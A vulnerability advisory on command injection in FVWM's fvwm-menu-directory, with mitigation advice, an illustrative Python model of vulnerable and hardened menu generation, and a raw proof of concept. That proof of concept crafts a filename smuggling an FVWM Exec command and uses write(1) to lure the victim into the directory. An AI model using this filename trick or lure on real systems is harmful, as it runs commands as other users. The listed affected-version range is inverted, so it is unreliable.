Vendor: FVWM
Submitted by: Unknown
CVSS: 7.5 (HIGH)
Vulnerability type: Command Execution
CWE: 78 (OS Command Injection)
Product Name: FVWM
Affected Version From: 2.14.17
Affected Version To: 2.5.8
Patch Exists: NO
CPE: a:fvwm_project:fvwm
Metasploit: none
Other Scripts: none
Platforms Tested: Unknown

Command Execution Vulnerability in FVWM

FVWM is prone to a command execution vulnerability that allows an attacker to execute arbitrary commands on a vulnerable system. The fvwm-menu-directory component builds FVWM menu definitions from the names of the files in a directory without sanitizing those names. Because FVWM reads its configuration line by line, a filename that contains a newline followed by an FVWM command such as `Exec` is emitted as a command line of its own and is executed with the privileges of the user running FVWM. Any user who can create files in a directory that the victim browses with fvwm-menu-directory can therefore run arbitrary commands as that victim; the proof of concept in the raw data creates such a file and then uses write(1) to lure the victim into the directory.

Mitigation:

Filenames read from a directory are attacker-controlled input and must be escaped before fvwm-menu-directory embeds them in menu definitions: at a minimum, line breaks and other control characters must be removed or rejected so that a name cannot terminate the menu entry and begin a new command, and quote characters must be escaped both in the menu label and in the shell command handed to Exec. No patch is listed for this issue; until one is available, do not run fvwm-menu-directory on directories that untrusted users can write to.
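The following script is an added illustration of the flaw described above and of the mitigation; it is not code from the FVWM project. It models a directory-to-menu generator in the style of fvwm-menu-directory with a deliberately simplified FVWM syntax (`AddToMenu <menu> "<label>" <action>`), treats FVWM as the line-oriented config reader it is, and uses a directory listing constructed inline (including the filename the PoC's `touch` command creates) so that it runs offline. The quoting rules in `fvwm_label` are assumptions for the model, not a description of FVWM's exact parser.

```python
"""Added model of the fvwm-menu-directory injection (not the project's code).

A naive generator splices filenames verbatim into FVWM menu text; because
FVWM reads configuration one line at a time, a filename containing a newline
turns the rest of the name into a top-level FVWM command. The hardened
generator strips control characters and escapes quotes so that every output
line is still an AddToMenu entry.
"""
import re
import shlex

MENU = "DirMenu"

# Constructed listing. The second name is exactly what the PoC's touch
# command creates: a newline, an FVWM Exec command, two more newlines.
SAMPLE_NAMES = [
    "notes.txt",
    '\nExec xmessage "0wn3d"\n\n',
    "report.pdf",
]


def naive_menu(names, menu=MENU):
    """Vulnerable: filenames are embedded without any escaping."""
    return "\n".join(
        f'AddToMenu {menu} "{name}" Exec exec xdg-open "{name}"' for name in names
    )


_CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def fvwm_label(name):
    """Quote a menu label for the simplified FVWM double-quoted string.

    Control characters (newlines above all) are replaced with '?', since a
    newline would end the config line and start a new command. Backslash and
    double quote are backslash-escaped (assumed escaping rule of the model).
    """
    name = _CONTROL.sub("?", name)
    return '"' + name.replace("\\", "\\\\").replace('"', '\\"') + '"'


def shell_arg(name):
    """Quote the filename for the shell that Exec hands the rest of the line to."""
    return shlex.quote(_CONTROL.sub("?", name))


def hardened_menu(names, menu=MENU):
    """Hardened: one AddToMenu line per file, no way to start a new command."""
    return "\n".join(
        f"AddToMenu {menu} {fvwm_label(name)} Exec exec xdg-open {shell_arg(name)}"
        for name in names
    )


def stray_lines(menu_text):
    """Non-blank lines a line-oriented reader would not see as AddToMenu
    entries, i.e. text the attacker has promoted to a command of its own."""
    return [
        line for line in menu_text.split("\n")
        if line.strip() and not line.startswith("AddToMenu ")
    ]


if __name__ == "__main__":
    print("naive generator, lines FVWM would run as commands:")
    for line in stray_lines(naive_menu(SAMPLE_NAMES)):
        print("   ", repr(line))
    print("hardened generator, stray lines:", stray_lines(hardened_menu(SAMPLE_NAMES)))
```

Running it shows the naive output containing `Exec xmessage "0wn3d"` as a standalone line (twice, once from the label and once from the action), while the hardened output has exactly one line per file and nothing FVWM would interpret as a separate command.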

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9161/info

It has been reported that FVWM may be prone to a command execution vulnerability that may allow an attacker to execute malicious commands on a vulnerable system. It has been reported that the fvwm-menu-directory component does not properly sanitize user input and allows a user with write permissions to a directory to execute arbitrary commands.

FVWM versions 2.14.17 and 2.5.8 have been reported to be vulnerable to this issue, however other versions may be affected as well. 

# Create a file whose name is a newline, an FVWM Exec command and two more
# newlines. When fvwm-menu-directory lists this directory the name is emitted
# unescaped, so FVWM reads the embedded line as a command and runs it.
$ touch '
> Exec xmessage "0wn3d"
>
> '
# Lure the victim (here the user fvwmguy) into browsing the directory.
$ write fvwmguy <<< "k3wl mp3 in `pwd` OMG LOLOLOL!!!1111"